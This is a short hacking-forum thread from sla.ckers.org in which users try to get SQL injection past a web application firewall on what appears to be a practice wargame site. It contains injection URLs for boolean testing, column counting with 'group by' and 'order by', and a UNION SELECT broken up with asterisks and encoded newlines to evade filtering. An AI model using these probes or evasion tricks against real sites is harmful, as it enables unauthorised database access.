Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Tough mod security
Posted by: zikmik
Date: December 27, 2013 11:31AM

http://wargame.balcan-underground.net/vesti.php?id=2

This is as far as I go:

http://wargame.balcan-underground.net/vesti.php?id=2 and true
http://wargame.balcan-underground.net/vesti.php?id=2 and false

http://wargame.balcan-underground.net/vesti.php?id=2 group by 1--
http://wargame.balcan-underground.net/vesti.php?id=2 group by 2--

Options: ReplyQuote
Re: Tough mod security
Posted by: JACK.HAMMER
Date: December 27, 2013 01:15PM

iam get the number of column and its 1


http://wargame.balcan-underground.net/vesti.php?id=2+order+%0Aby+1--


my friend really its so hard WAF but iam reach for that

http://wargame.balcan-underground.net/vesti.php?id=-2+UN*ION+SEL*ECT+%0A12D2D

but idont know if its true or not ?!! we need another help



Edited 1 time(s). Last edit at 12/27/2013 01:28PM by JACK.HAMMER.

Options: ReplyQuote
Re: Tough mod security
Posted by: firestorm
Date: December 29, 2013 08:36AM

How you came to conclusion that it is mod security ?
To me it appears to be cloudflare. In either case, good luck.

Options: ReplyQuote


Sorry, only registered users may post in this forum.